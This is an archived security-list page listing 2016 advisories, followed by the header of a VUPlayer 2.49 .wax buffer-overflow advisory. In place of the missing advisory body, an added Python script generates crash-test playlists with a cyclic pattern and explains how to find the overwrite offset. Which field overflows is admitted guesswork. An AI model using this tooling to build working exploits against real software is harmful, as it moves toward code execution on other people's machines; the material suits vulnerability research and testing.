VUPlayer 2.49 - (.wax) Buffer Overflow Vulnerability
2016-07-27  Vulnerability Lab (research vulnerability-lab com)

Other posts in this archive listing:

VUPlayer 2.49 - (.pls) Buffer Overflow Vulnerability
2016-07-27  Vulnerability Lab (research vulnerability-lab com)
  Reference: http://www.vulnerability-lab.com/get_content.php?id=1876 (release date 2016-07-25)

DornCMS v1.4 - (FileManager) Persistent Cross Site Scripting Vulnerability
2016-07-27  Vulnerability Lab (research vulnerability-lab com)
  Reference: http://www.vulnerability-lab.com/get_content.php?id=1885 (release date 2016-07-26)

Nusiorung CMS 2016 - (Login) Auth Bypass Vulnerability
2016-07-27  Vulnerability Lab (research vulnerability-lab com)
  Reference: http://www.vulnerability-lab.com/get_content.php?id=1875 (release date 2016-07-13)

[security bulletin] HPSBST03603 rev.1 - HPE StoreVirtual Products running LeftHand OS using glibc, Remote Arbitrary Code Execution, Denial of Service (DoS)
2016-07-26  security-alert hpe com
  PGP-signed (SHA1). Document ID c05212266, version 1. Current version: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05212266

Silurus Classifieds XSS Vulnerability
2016-07-26  zhiwei_jiang (ak47464659484 gmail com)
  Software: Silurus Classifieds v2.0. Vendor: http://snowhall.com/slides/silurus. Published: 2016-07-25. Impact: Medium (CVSS2 base 4.3, AV:N/AC:M/Au:N/C:N/I:P/A...

Cross-Site Scripting vulnerability in ColorWay WordPress Theme
2016-07-26  Summer of Pwnage (lists securify nl); Yorick Koster, July 2016

Dropbox 6.4.14 DLL Hijacking Vulnerability
2016-07-26  mehta himanshu21 gmail com
  Summary: the Dropbox Installer for Windows contains a DLL hijacking vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the targeted system. The vulnerability exists because a DLL file is loaded improperly by 'DropboxInstaller.exe', and it allows an a...

Huawei ISM Professional XSS Vulnerability
2016-07-26  zhiwei_jiang (ak47464659484 gmail com)
  Software: ISM Professional OceanStor (Copyright Huawei Technologies Co., Ltd. 2009-2010). Vendor: www.huawei.com. Published: 2016-07-25.

Crashing Browsers Remotely via Insecure Search Suggestions
2016-07-26  research nightwatchcybersecurity com
  Original: https://wwws.nightwatchcybersecurity.com/2016/07/26/research-crashing-browsers-remotely-via-insecure-search-suggestions/
  Summary: intercepting insecure search suggestion requests from browsers and returning very large responses leads to browser crashes (but not RCE). Affected brow...

MySQL 0days followup (CVE-2016-3477) CVSS 8.1
2016-07-26  lem nikolas gmail com
  Among other issues reported, the most critical flaw in the July 2016 CPU, rated CVSS v3.0 base score 8.1, is the Server Parser subcomponent issue (CVE-2016-3477) and one of our findings. Versions 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier are affected. The zero-day permits unauth...

July 2016 - Bamboo Server - Critical Security Advisory
2016-07-26  David Black (dblack atlassian com)
  PGP-signed (SHA512). Current version: https://confluence.atlassian.com/x/rSGSMQ
  CVE-2016-5229 - Deserialisation in Bamboo. Affected Bamboo versions: 2.3.1 <= version < 5.11.4.1; 5.12.0 <= vers...

[security bulletin] HPSBGN03630 rev.1 - HP Operations Manager for Unix, Solaris, and Linux using Apache Commons Collections (ACC), Remote Code Execution
2016-07-25  security-alert hpe com
  PGP-signed (SHA1). Document ID c05206507, version 1. Current version: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05206507

Secunia Research: Reprise License Manager "akey" Buffer Overflow Vulnerability
2016-07-25  Secunia Research (remove-vuln secunia com)

Secunia Research: Reprise License Manager "actserver" Buffer Overflow Vulnerability
2016-07-25  Secunia Research (remove-vuln secunia com)

FreeBSD Security Advisory FreeBSD-SA-16:25.bspatch
2016-07-25  FreeBSD Security Advisories (security-advisories freebsd org)

XSS and SQLi in huge IT gallery v1.1.5 for Joomla
2016-07-25  Larry W. Cashdollar (larry0 me com)
  Fixed: v1.1.7. Authors: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva. Date: 2016-07-14. Download site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro. Vendor: huge-it.com. Vendor notif...

SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr
2016-07-25  SEC Consult Vulnerability Lab (research sec-consult com)

Cross-Site Scripting in Code Snippets WordPress Plugin
2016-07-24  Summer of Pwnage (lists securify nl); Burak Kelebek, July 2016

Neoscreen v4.5 Cross-site scripting
2016-07-24  alex_haynes outlook com
  Product: Neoscreen by Cube Digital Media. Vulnerable versions: 4.5 and all previous versions; tested version 4.5. Advisory publication: July 24, 2016. Vulnerability type: Cross-Site Scripting [CWE-79]. CVE reference: none. Credit: Alex Haynes.

Neoscreen v4.5 Blind SQL injection
2016-07-24  alex_haynes outlook com
  Product: Neoscreen by Cube Digital Media. Vulnerable versions: 4.5 and all previous versions; tested version 4.5. Advisory publication: July 24, 2016. Vulnerability type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [C...

Neoscreen v4.5 Authentication bypass
2016-07-24  alex_haynes outlook com
  Product: Neoscreen by Cube Digital Media. Vulnerable versions: 4.5 and all previous versions; tested version 4.5. Advisory publication: July 24, 2016. Vulnerability type: Authentication Bypass Issues [CWE-592]. CVE reference: none. Credit: Alex Haynes.

Autobahn|Python Insecure allowedOrigins validation >= 0.14.1
2016-07-23  mgill c0ffee me
  Observation: Autobahn|Python incorrectly checks the Origin header when the 'allowedOrigins' value is set. This can allow third parties to execute legitimate WAMP WebSocket requests against an Autobahn|Python/Crossbar.io server within another browser's context. Proof of concept: the fol...

Defense in depth -- the Microsoft way (part 41): vulnerable by (poor implementation of bad) design
2016-07-23  Stefan Kanthak (stefan kanthak nexgo de)
  Hi @ll, Windows 7 introduced the "Deployment Image Servicing and Management" tool DISM.exe; this command line program is called, for example, by its predecessor PkgMgr.exe (a GUI program which requests elevated privileges), or by Windows Update (which runs under the SYSTEM account). DISM.exe needs to be...
Document Title:
===============
VUPlayer 2.49 - (.wax) Buffer Overflow Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1877

Release Date:
=============
2016-07-26

Vulnerability Laboratory ID (VL-ID):
====================================
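The advisory header above states only that VUPlayer 2.49 overflows a buffer when it loads a .wax playlist; the body of the advisory is cut off on this page. The script below is an added example, not Vulnerability Lab's proof of concept: it writes a series of .wax files whose single entry path grows in length and is filled with a Metasploit-style cyclic pattern, so that whatever 4-byte value ends up in a register at the crash maps to exactly one offset in the input. Which field overflows, the lengths tried, and the two file layouts (ASX-style XML and a bare path per line) are assumptions; the script produces crash-test inputs only, with no addresses or payload.

```python
"""
Crash-test input generator for VUPlayer 2.49 .wax playlist parsing.

Added example, not the advisory's own code. Assumptions (the advisory body is
truncated on this page):
  * the overflow is reached through an overlong entry path in the playlist;
  * VUPlayer accepts .wax either as ASX-style XML or as one bare path per line.
Output is a series of files of growing length; no offsets, return addresses
or payload are included.
"""
import os
import string

# ASX-format skeleton used by .wax/.wvx playlists; {href} is the field under test.
ASX_TEMPLATE = (
    '<ASX version="3.0">\r\n'
    '  <TITLE>wax length test</TITLE>\r\n'
    '  <ENTRY>\r\n'
    '    <REF HREF="{href}" />\r\n'
    '  </ENTRY>\r\n'
    '</ASX>\r\n'
)

PATTERN_MAX = 26 * 26 * 10 * 3  # 20280 bytes: longest pattern with unique 4-byte windows


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...); every 4-byte window is unique."""
    if not 0 < length <= PATTERN_MAX:
        raise ValueError("length must be 1..%d" % PATTERN_MAX)
    chunks = []
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                chunks.append(up + lo + dg)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(pattern, value):
    """Map a crashed 32-bit register (int as shown by the debugger, or its 4 chars)
    back to its offset in the pattern; -1 if the value did not come from it."""
    if isinstance(value, int):
        needle = value.to_bytes(4, "little").decode("latin-1")  # x86 is little-endian
    else:
        needle = value
    return pattern.find(needle)


def build_wax(length, style="asx", fill=None):
    """Playlist bytes with one entry whose path is `length` bytes long.
    fill=None uses the cyclic pattern so a crash can be mapped to an offset."""
    body = pattern_create(length) if fill is None else (fill * length)[:length]
    if style == "asx":
        text = ASX_TEMPLATE.format(href=body)
    elif style == "raw":
        text = body + "\r\n"
    else:
        raise ValueError("style must be 'asx' or 'raw'")
    return text.encode("latin-1")


def write_series(outdir, lengths=(1000, 2500, 5000, 10000, 20000), style="asx"):
    """Write one file per length (lengths are an assumed test ladder). Open each in
    VUPlayer under a debugger, stop at the first that crashes, then pass the EIP
    value to pattern_offset() to learn how far into the path the overwrite lands."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for n in lengths:
        path = os.path.join(outdir, "test_%s_%d.wax" % (style, n))
        with open(path, "wb") as fh:
            fh.write(build_wax(n, style))
        paths.append(path)
    return paths


if __name__ == "__main__":
    import sys
    for p in write_series(sys.argv[1] if len(sys.argv) > 1 else "wax_tests"):
        print("wrote", p)
```

Run it once with an output directory, open the files in VUPlayer 2.49 in ascending order under a debugger, and feed the faulting register value to `pattern_offset()`; if the raw one-path-per-line layout is the one VUPlayer actually mishandles, repeat with `style="raw"`.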